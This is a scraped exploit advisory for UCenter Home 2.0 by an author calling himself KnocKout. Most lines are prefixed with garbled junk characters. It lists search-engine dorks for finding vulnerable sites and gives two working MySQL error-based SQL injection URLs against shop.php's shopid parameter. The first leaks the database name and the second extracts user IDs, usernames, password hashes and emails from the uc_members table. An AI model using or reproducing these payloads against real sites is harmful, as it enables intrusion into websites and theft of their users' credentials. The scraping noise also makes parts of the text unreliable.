3 j+ s; M* n: n) p2 f. ?7 C. A__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
# ^+ Y7 i- f$ U* b) m! P) l) Q* [: K. D9 L$ u0 z, w9 ~
, }$ n: R, k: U' |0 |# p" i: I* u6 b
*/ Author : KnocKout ! n; u' J: F8 W" M
( i+ G4 q, z# v- `*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
0 T, Q9 N6 o3 b( e1 s) v: P
+ ~. D2 _. Q9 d1 C) d: r*/ Contact: knockoutr@msn.com 4 t; `/ V2 J& `8 Z e! s: l
% W9 w# B% s& P% U0 E6 i) R*/ Cyber-Warrior.org/CWKnocKout 8 E0 \" K7 R, y+ A q0 J o
* b. {/ N$ n3 \9 Z) O4 P8 D6 S1 w% `
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + |" E: E( l+ p6 O5 {# x" i
; L2 n4 q8 k# y% {Script : UCenter Home ^* J) t( W3 A- k) k$ V& Y; [
( ?2 W. t8 Y8 {: x. \Version : 2.0 " Q! _* e1 ?7 Z4 L+ H7 M' k: u. n* E$ T
. e) ]/ W% w; Y: M, A( ^$ x. h9 d
Script HomePage : http://u.discuz.net/ : E0 b: n) R; Z5 D8 e* c* B
1 O7 |% M1 Q6 T) ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 [* D2 F) r }% }* ~9 T
- \8 L" }6 \6 Q+ u5 R1 HDork : Powered by UCenter inurl:shop.php?ac=view ! p: F0 a! y- W2 L
8 C- n1 e! r! u9 ^2 _7 eDork 2 : inurl:shop.php?ac=view&shopid= / {/ v1 n& |" y u! T1 ^
8 i" j0 x# V8 J8 X1 M
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ X7 |2 D" @& Z- @/ I" C8 p$ d8 @: j1 F' ^( ]/ b ~/ }+ u
Vuln file : Shop.php / q1 O/ K# c( e+ M6 y i9 U" ?
$ H2 q; y- L( I2 i& Mvalue's : (?)ac=view&shopid=
+ O( l- h1 e$ Q. Z# F W0 Z2 X7 H4 E% b% h& v+ N# R0 w
Vulnerable Style : SQL Injection (MySQL Error Based) . ]5 j9 ^7 B) I8 `
( p( Q0 {" b+ B# z0 i- pNeed Metarials : Hex Conversion
+ J5 K8 z# b/ l: r( z" W7 b* v# m1 R7 u
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 F$ h0 o+ \( e9 x0 `+ W$ p" }) P6 g" v: W1 W% v B, Q
Your Need victim Database name.
1 e9 q X% U/ x3 r! R5 k, n
( Z( r l6 p; U6 y0 nfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
' f' ^, Y6 A& u% P) R6 ?
+ `% C+ Y1 i& U7 v# `. A- J.. \& P+ f! I! I
3 Z. c2 v# }2 l4 v- P9 ^# w7 K# {( GDB : Okey. & z# G0 }: d' B' S8 K
, Z$ w' U9 j6 J; L. j0 [! F
your edit DB `[TARGET DB NAME]` ! }4 j0 r4 n2 T& i8 q
! x' A. ?8 ~5 b8 Y2 r1 V5 J) I/ y
Example : 'hiwir1_ucenter'
% J8 x* N2 p3 C' h
+ D* n3 n5 y" Q5 \" T: u3 |2 D! CEdit : Okey.
2 D, l1 \ S5 A# z/ S% ?3 u: a8 Y" q; s( e* L
Your use Hex conversion. And edit Your SQL Injection Exploit.. 1 Q3 G) {% D# |+ t& a; T5 J$ l; w
* \. d+ {' _# D; M3 q0 Q8 U
! b) P, y+ ^. b$ }2 B9 a, ], Q" E$ S! Z: ?; d
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
5 |- `6 d3 K/ |' M9 U4 w3 O |